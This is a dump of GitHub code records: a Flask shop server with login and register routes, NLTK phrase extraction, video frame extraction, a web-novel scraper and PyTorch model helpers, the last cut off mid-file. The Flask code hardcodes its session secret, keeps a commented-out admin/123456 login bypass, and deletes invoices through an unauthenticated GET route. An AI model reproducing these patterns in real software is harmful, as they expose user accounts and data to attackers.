person[1]\n apelido = person[2]\n end = person[7]\n if sha256_crypt.verify(password, check_password):\n session['logged_in'] = True\n session['email'] = email\n session['Completo'] = f'{nome} {apelido}'\n session['Nome'] = f'{nome}'\n session['ID_User'] = id\n session['delivery'] = end\n print('certo')\n\n return redirect(url_for(page_url))\n\n else:\n print('senha erro')\n flash(\"Login ou Senha Errada, confira e tenta novamente\", 'erro')\n return redirect(url_for(page_url))\n else:\n email = request.form['EMAIL']\n password = request.form['PASSWORD']\n check_user = SelectSql('usuarios', 'LOGIN', email)\n\n if check_user == False:\n flash(\"Login ou Senha Errada, confira e tenta novamente\", 'erro')\n\n return redirect(url_for('index'))\n else:\n for person in check_user:\n\n id = person[0]\n check_password = person[4]\n nome = person[1]\n apelido = person[2]\n end = person[7]\n if sha256_crypt.verify(password, check_password):\n session['logged_in'] = True\n session['email'] = email\n session['Completo'] = f'{nome} {apelido}'\n session['Nome'] = f'{nome}'\n session['ID_User'] = id\n session['delivery'] = end\n print('certo')\n\n return redirect(url_for('dashboard'))\n\n else:\n print('senha erro')\n flash(\"Login ou Senha Errada, confira e tenta novamente\", 'erro')\n return redirect(url_for('index'))\n\n # if email == \"admin@admin.com\" and password == \"123456\":\n # session['admin'] = True\n #\n #\n #\n #\n # return redirect(url_for('dashboard'))\n #\n\n return render_template(\"index.html\", error=error)\n\n except Exception as e:\n # flash(e)\n return redirect(url_for('index'))\n\n\n\n\n\n############ ROTAS DE TRABALHO ####################\n\n\n\n#\n# ##### EMAIL FORGOT / TOKEN #####\n#\n#\n#\n# @app.route('/token/<string:email>', methods=['GET', 'POST'])\n# def token(email):\n# token = generateOTP()\n# print(token)\n# UpdateQuerySql({'OTP': token}, 'usuarios', 'EMAIL', email)\n# user = SelectSql('usuarios', 'LOGIN', email)\n# for item in user:\n# # id = item[0]\n# nome_completo = f'{item[3]} {item[4]}'\n# if __name__ == '__main__':\n# with app.app_context():\n# msg = Message(subject='Pedido de Nova Senha',\n# sender=app.config.get('MAIL_USERNAME'),\n# recipients=[email],\n# html=render_template('email_reply.html', token=token, user=nome_completo))\n# mail.send(msg)\n# flash('Verifique o seu e-mail, um novo código foi enviado.', 'login')\n# return render_template('insert_code.html', email=email)\n#\n# @app.route('/send_email_password', methods=['GET', 'POST'])\n# def index_mail():\n# email = request.form['email']\n# token = generateOTP()\n# print(token)\n# user = SelectSql('usuarios','LOGIN',email)\n# if user == False:\n# flash(f'Esse email não está cadastrado!!! Verifique se está correto o email {email}','erro')\n# return redirect(url_for('email_forgot'))\n# else:\n# UpdateQuerySql({'OTP': token}, 'usuarios', 'EMAIL',email)\n# for item in user:\n# nome_completo = f'{item[3]} {item[4]}'\n# if __name__ == '__main__':\n# with app.app_context():\n# msg = Message(subject='Código para alteração de password Guia Figueira da Foz',\n# sender=app.config.get('MAIL_USERNAME'),\n# recipients=[email],\n# html=render_template('email_reply.html',token=token, user=nome_completo))\n# mail.send(msg)\n# return render_template('insert_code.html', email=email)\n#\n#\n# @app.route('/confima_code', methods=['GET', 'POST'])\n# def confirma_code():\n# if request.method == \"POST\":\n# email = request.form['email']\n# code = request.form['code']\n# new_password = sha256_crypt.encrypt((str(request.form['new_password'])))\n# data = SelectSql('usuarios', 'LOGIN',email)\n# for item in data:\n# OTP = item[12]\n# if str(OTP) == str(code):\n# UpdateQuerySql({'PASSWORD':new_password}, 'usuarios','EMAIL',email)\n# flash('Senha Atualizada com Sucesso!', 'success')\n# return redirect(url_for('LoginClientes'))\n# else:\n# flash('Código não está correto, tente novamente', 'erro')\n# return render_template('insert_code.html',email=email)\n#\n#\n#\n# ####### REGISTER USUARIOS ##########\n\n#\n@app.route('/register', methods=['POST'])\ndef register():\n error = ''\n try:\n if request.method == 'POST':\n email = request.form['EMAIL']\n nome = request.form['NOME']\n apelido = request.form['SOBRENOME']\n check_user = SelectSql('usuarios', 'LOGIN', email)\n print(check_user)\n if check_user == False:\n password = sha256_crypt.encrypt((str(request.form['PASSWORD'])))\n # DATA = str(datetime.now().strftime(\"%b %d,%Y\"))\n myDict = {\n 'LOGIN': email,\n 'PASSWORD' : password,\n 'NOME' : nome,\n 'SOBRENOME' : apelido,\n 'NOTIFICACOES' : 0 ,\n 'PONTOS' : 0,\n 'DATA_INSCRICAO': f'{dia} {mes}',\n 'ENDERECO': False\n\n }\n InsertSql(myDict,'usuarios')\n user = SelectSql('usuarios', 'LOGIN',email)\n for item in user:\n id = item[0]\n session['logged_in'] = True\n session['email'] = email\n session['Completo'] = f'{nome} {apelido}'\n session['Nome'] = f'{nome}'\n session['ID_User'] = id\n session['delivery'] = False\n return redirect(url_for('dashboard'))\n else:\n flash('Usuário já cadastrado, escolha um email diferente', 'login')\n return redirect(url_for('index'))\n return redirect(url_for('index'))\n\n except Exception as e:\n flash(e)\n\n\n\n@app.route('/invoice_promo', methods=['GET', 'POST'])\ndef invoice_promo():\n from datetime import timedelta\n d = datetime.today()\n if request.method == \"POST\":\n for post in request.form:\n #### PEDIDO ####\n while d.weekday() != 4:\n d += timedelta(1)\n data_entrega = str(d)\n dia_entrega = data_entrega[8:10]\n mes_entrega = data_entrega[5:7]\n ano_entrega = data_entrega[0:4]\n entrega = f'{dia_entrega}/{mes_entrega}/{ano_entrega}'\n if post == 'ENDERECO':\n #### INSERT USER ENDERECO #####\n myDict_user = {'ENDERECO':request.form['ENDERECO'],\n 'APT':request.form['APT'],\n 'BAIRRO':request.form['BAIRRO'],\n 'CEP':request.form['CEP'],\n 'TELEFONE': request.form['TELEFONE'],\n }\n\n myDict_invoice = {'PEDIDO_1':request.form['PEDIDO_1'],\n 'PEDIDO_2':request.form['PEDIDO_2'],\n 'id_usuarios':request.form['ID'],\n 'DATA':f'{dia} {mes}',\n 'STATUS': 'A ENTREGAR',\n 'CATEGORIA':'PROMOCAO',\n 'ENTREGA':entrega}\n\n\n UpdateQuerySql(myDict_user,'usuarios','id_usuarios',request.form['ID'])\n InsertSql(myDict_invoice,'invoice')\n ADD_pontos(20, request.form['ID'])\n session['invoice'] = True\n session['delivery'] = True\n\n return redirect(url_for('dashboard'))\n else:\n myDict_invoice = {'PEDIDO_1': request.form['PEDIDO_1'],\n 'PEDIDO_2': request.form['PEDIDO_2'],\n 'id_usuarios': request.form['ID'],\n 'DATA': f'{dia} {mes}',\n 'STATUS': 'A ENTREGAR',\n 'CATEGORIA': 'PROMOCAO',\n 'ENTREGA':entrega}\n\n InsertSql(myDict_invoice, 'invoice')\n ADD_pontos(20, request.form['ID'])\n return redirect(url_for('dashboard'))\n return redirect(url_for('dashboard'))\n\n@app.route('/delete_invoice/<string:id_data>', methods = ['GET'])\ndef delete(id_data):\n print(id_data)\n c, conn = connection()\n c.execute(\"DELETE FROM invoice WHERE id_invoice=%s\", (id_data))\n conn.commit()\n conn.close()\n return redirect(url_for('dashboard'))\n\n\n\n# ############## CONFIGURACOES DE USUARIOS #################\n#\n# @app.route('/edit_profile_photo', methods=['GET', 'POST'])\n# def edit_profile_photo():\n# if request.method == \"POST\":\n# myDict = {}\n# if request.files['file']:\n# f = request.files['file']\n# print(f)\n# if f and allowed_file(f.filename):\n# filename = secure_filename(f.filename)\n# f.save(os.path.join(app.config['UPLOAD_FOLDER'], 'avatar'+filename))\n# myDict.update({'FOTO':'avatar'+filename})\n# UpdateQuerySql(myDict, 'usuarios','EMAIL',session['email'])\n# return redirect(url_for('dashboard'))\n#\n#\n# @app.route('/usuarios/', methods=['GET', 'POST'])\n# def usuarios():\n# c, conn = connection()\n# c.execute(\"SELECT * FROM usuarios\")\n# data = c.fetchall()\n# c.close()\n# return render_template('lista-Usuarios.html', usuarios=data )\n#\n#\n#\n# @app.route('/edit_usuario', methods=['GET', 'POST'])\n# def edit_usuario():\n# if request.method == \"POST\":\n# data = []\n# myDict = {}\n# for post in request.form:\n# data.append(post)\n# for form in data:\n# request_form = request.form[form]\n# print(request_form)\n# myDict.update({form: request_form})\n# if request_form == '':\n# request_form = \"blank\"\n# myDict.update({form: request_form})\n# else:\n# myDict.update({form: request_form})\n# print(myDict)\n# UpdateQuerySql(myDict, 'usuarios', 'EMAIL', session['email'])\n# return redirect(url_for('dashboard'))\n#\n#\n# @app.route('/delete/<string:id_data>', methods = ['GET'])\n# def delete(id_data):\n# flash(\"Record Has Been Deleted Successfully\")\n# c, conn = connection()\n# c.execute(\"DELETE FROM usuarios WHERE id_usuario=%s\", (id_data,))\n# return redirect(url_for('usuarios'))\n#\n#\n\n\n\n\ndef main ():\n app.secret_key = 'IPA_Criolina_1980'\n port = int(os.environ.get(\"PORT\", 5002))\n app.run (host=\"0.0.0.0\", port=port)\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "raggaxe/criolina", "sub_path": "servidor.py", "file_name": "servidor.py", "file_ext": "py", "file_size_in_byte": 18179, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 28, "usage_type": "call"}, {"api_name": "flask_mail.Mail", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 88, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 82, "usage_type": "call"}, {"api_name": "dbconnect.connection", "line_number": 101, "usage_type": "call"}, {"api_name": "dbconnect.connection", "line_number": 113, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 132, "usage_type": "call"}, {"api_name": "random.random", "line_number": 132, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 138, "usage_type": "call"}, {"api_name": "autualizador.UpdateQuerySql", "line_number": 141, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 150, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.session.clear", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 182, "usage_type": "name"}, {"api_name": "autualizador.SelectSql", "line_number": 183, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 184, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 200, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 215, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 235, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 235, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 237, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 237, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 238, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 238, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 239, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 239, "usage_type": "name"}, {"api_name": "autualizador.SelectSql", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 241, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 241, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 244, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 246, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 246, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt.verify", "line_number": 254, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt", "line_number": 254, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 255, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 257, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 258, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 259, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 260, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 267, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 270, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 270, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "autualizador.SelectSql", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 277, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 277, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt.verify", "line_number": 286, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt", "line_number": 286, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 287, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 288, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 289, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 290, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 291, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 292, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 299, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 300, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 300, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 311, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 315, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 315, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 398, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 398, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 399, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 399, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 400, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 400, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 401, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 401, "usage_type": "name"}, {"api_name": "autualizador.SelectSql", "line_number": 402, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt.encrypt", "line_number": 405, "usage_type": "call"}, {"api_name": "passlib.hash.sha256_crypt", "line_number": 405, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 405, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 405, "usage_type": "name"}, {"api_name": "autualizador.InsertSql", "line_number": 418, "usage_type": "call"}, {"api_name": "autualizador.SelectSql", "line_number": 419, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 422, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 423, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 424, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 425, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 426, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 427, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 428, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 428, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 430, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 431, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 431, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 432, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 432, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 435, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 442, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 442, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 443, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 443, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 444, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 444, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 447, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 455, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 455, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 456, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 456, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 457, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 457, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 458, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 458, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 459, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 459, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 462, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 462, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 463, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 463, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 464, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 464, "usage_type": "name"}, {"api_name": "autualizador.UpdateQuerySql", "line_number": 471, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 471, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 471, "usage_type": "name"}, {"api_name": "autualizador.InsertSql", "line_number": 472, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 473, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 473, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 474, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 475, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 477, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 477, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 479, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 479, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 480, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 480, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 481, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 481, "usage_type": "name"}, {"api_name": "autualizador.InsertSql", "line_number": 487, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 488, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 488, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 489, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 489, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 490, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 490, "usage_type": "call"}, {"api_name": "dbconnect.connection", "line_number": 495, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 499, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 499, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 565, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 565, "usage_type": "attribute"}]} +{"seq_id": "27064786262", "text": "# import semantic\nimport string\nfrom nltk.corpus import stopwords\nstopw = list(set(stopwords.words('english')))\nstopw.extend(list(set(string.punctuation)))\nfrom phrasehandlingv3 import PhraseHandling\nphraseobj=PhraseHandling()\nimport json\ndata=json.load(open(\"MongoRelatedData\"))\n# sem_obj = semantic.Semantic()\nwords=[]\nfor ii,dd in enumerate(data):\n # print(ii, len(data))\n # print(d)\n # if d==\"associate consultant\":\n # print(1)\n allwords = []\n for d in dd:\n print(d)\n # try:\n pgr = phraseobj.phrases(d)\n pgr = list(set(pgr)-set(stopw))\n # semanticwords = sem_obj.semanticJobSearch(d, 0)\n #\n # for k, v in semanticwords.items():\n # for l in v:\n # if type(l)==dict:\n # if \"name\" in l:\n if len(pgr)>0:\n allwords.extend(pgr)\n # except:\n # pass\n\n allwords = list(set(allwords))\n if len(allwords)>0:\n words.append(allwords)\n # print(allwords)\nwith open(\"MongoRelatedData_words2\",\"w\") as f:\n json.dump(words,f)\n\n\n", "repo_name": "Prashantietedelhi/common", "sub_path": "src/extract_phrases.py", "file_name": "extract_phrases.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "nltk.corpus.stopwords.words", "line_number": 4, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 4, "usage_type": "name"}, {"api_name": "string.punctuation", "line_number": 5, "usage_type": "attribute"}, {"api_name": "phrasehandlingv3.PhraseHandling", "line_number": 7, "usage_type": "call"}, {"api_name": "json.load", "line_number": 9, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "8687935591", "text": "import os\nimport cv2\nimport glob\n\npath = \"D:/Private Studies/GRID dataset/s1.mpg_vcd/s1\"\nroot = glob.glob(\"{}/*.{}\".format(path, \"mpg\"))\nfor i in range(len(root)):\n vidcap = cv2.VideoCapture(root[i])\n success,image = vidcap.read()\n count = 0\n current_name, _ = os.path.splitext(os.path.basename(root[i]))\n file_path = \"{}/{}\".format(path, current_name)\n # print(file_path)\n if os.path.isdir(file_path) is False:\n os.mkdir(file_path)\n while success:\n cv2.imwrite(\"{}/{}/{number:05}.jpg\".format(path, current_name, number=count),image) # save frame as JPEG file\n success,image = vidcap.read()\n count += 1", "repo_name": "cilkim1/speech_ani_gan", "sub_path": "video_to_frame.py", "file_name": "video_to_frame.py", "file_ext": "py", "file_size_in_byte": 652, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "86", "api": [{"api_name": "glob.glob", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "18477235696", "text": "import torch.nn as nn\n\n\ndef init_weights_xav(m: nn.Module) -> None:\n \"\"\"\n Initialize Xavier normal weights for a layer.\n\n Parameters\n ----------\n m : nn.Module\n Layer whose weights to initialize.\n\n Returns\n -------\n None\n \"\"\"\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n m.bias.data.fill_(0)\n", "repo_name": "camille-004/rl", "sub_path": "src/models/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 363, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torch.nn.Module", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 4, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "3008339590", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport code\n\ndef code_what(url):\n from urllib import request\n from chardet import detect\n #读取网页内容\n data = request.urlopen(url).read()\n #chardet解析网页\n chardet1 = detect(data)\n return chardet1['encoding']\n\nheaders={\n 'UserAgent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'\n }\n\n#网站的初始页码\nurl= ''\n#apple = code_what(url)\nfor u in range(0,100000): \n res=requests.get(url,headers=headers)\n res.encoding = \"gbk\"\n\n soup=BeautifulSoup(res.text,'html.parser')\n \n print('正在下载')\n print(soup.find_all('h1')[0].string)\n #print(soup.find_all(\"a\"))\n #print(soup.find_all(\"a\",text=\"下一章\"))\n apple = soup.find_all(\"a\",text=\"下一章\")[0][\"href\"]\n #input()\n url='' + apple \n text_100 = soup.get_text()\n #print(text)\n m = re.search('style3', text_100)\n n = re.search('style4', text_100)\n try:\n text_101 = text[m.span()[1]+3:n.span()[0]]\n except:\n text_101 = text_100\n ls1 = []\n flag = True\n count = 0\n for i in text_101: \n if i == '\\u3000':\n if flag:\n ls1.append('\\n')\n flag = False\n continue\n else:\n flag = False\n continue\n ls1.append(i)\n flag = True\n \n \n ls3 = ''.join(ls1)\n #print(ls3)\n #print(text_101)\n ls3.encode('UTF-8')\n filename = 'write_data.txt'\n #print(ls3)\n \n with open(filename,'a',encoding='UTF-8') as f:\n f.write(ls3)\n print('下载完成'+str(u+1))\n \n\n\n \n\n", "repo_name": "Lin1110/-", "sub_path": "python.py", "file_name": "python.py", "file_ext": "py", "file_size_in_byte": 1717, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "urllib.request.urlopen", "line_number": 10, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 10, "usage_type": "name"}, {"api_name": "chardet.detect", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 23, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 26, "usage_type": "call"}, {"api_name": "re.search", "line_number": 37, "usage_type": "call"}, {"api_name": "re.search", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "11564957925", "text": "import torch\r\nimport torch.nn as nn\r\n\r\n\r\n\r\nclass ResidualStem(nn.Module):\r\n def __init__(self, input_dim, output_dim):\r\n super(ResidualStem, self).__init__()\r\n\r\n self.conv_block1 = nn.Sequential(\r\n \r\n nn.Conv2d(input_dim, int(output_dim/2), kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(int(output_dim/2)),\r\n nn.ReLU(),\r\n nn.Conv2d(int(output_dim/2), int(output_dim/2), kernel_size=3, padding=1),\r\n nn.BatchNorm2d(int(output_dim/2))\r\n )\r\n\r\n self.conv_block2 = nn.Sequential(\r\n nn.Conv2d(int(output_dim/2), output_dim, kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(output_dim),\r\n nn.ReLU(),\r\n nn.Conv2d(output_dim, output_dim, kernel_size=3, padding=1),\r\n nn.BatchNorm2d(output_dim)\r\n )\r\n\r\n self.conv_skip = nn.Sequential(\r\n nn.Conv2d(int(output_dim/2), output_dim, kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(output_dim)\r\n )\r\n\r\n self.relu = nn.ReLU(inplace=True)\r\n\r\n\r\n def forward(self, x):\r\n x1 = self.conv_block1(x)\r\n x2 = self.conv_block2(x1) + self.conv_skip(x1)\r\n x3 = self.relu(x2)\r\n return x3\r\n\r\n\r\nclass ResidualBlock(nn.Module):\r\n def __init__(self, input_dim, output_dim):\r\n super(ResidualBlock, self).__init__()\r\n\r\n self.conv_block1 = nn.Sequential(\r\n \r\n nn.Conv2d(input_dim, int(output_dim/2), kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(int(output_dim/2)),\r\n nn.ReLU(),\r\n nn.Conv2d(int(output_dim/2), int(output_dim/2), kernel_size=3, padding=1),\r\n nn.BatchNorm2d(int(output_dim/2))\r\n )\r\n\r\n self.conv_block2 = nn.Sequential(\r\n nn.Conv2d(int(output_dim/2), output_dim, kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(output_dim),\r\n nn.ReLU(),\r\n nn.Conv2d(output_dim, output_dim, kernel_size=3, padding=1),\r\n nn.BatchNorm2d(output_dim)\r\n )\r\n\r\n self.conv_skip = nn.Sequential(\r\n nn.Conv2d(int(output_dim/2), output_dim, kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(output_dim)\r\n )\r\n\r\n self.relu = nn.ReLU(inplace=True)\r\n\r\n\r\n def forward(self, x):\r\n x1 = self.conv_block1(x)\r\n x2 = self.relu(x + x1)\r\n x3 = self.conv_block2(x2) + self.conv_skip(x2)\r\n x4 = self.relu(x3)\r\n return x4\r\n\r\n\r\n\r\nclass BasicConv2d(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, bias=True):\r\n super(BasicConv2d, self).__init__()\r\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride, padding=padding, bias=bias)\r\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1)\r\n self.relu = nn.ReLU(inplace=True)\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.bn(x)\r\n x = self.relu(x)\r\n return x\r\n\r\n\r\n\r\nclass BridgeConv(nn.Module):\r\n\r\n def __init__(self, in_channels, 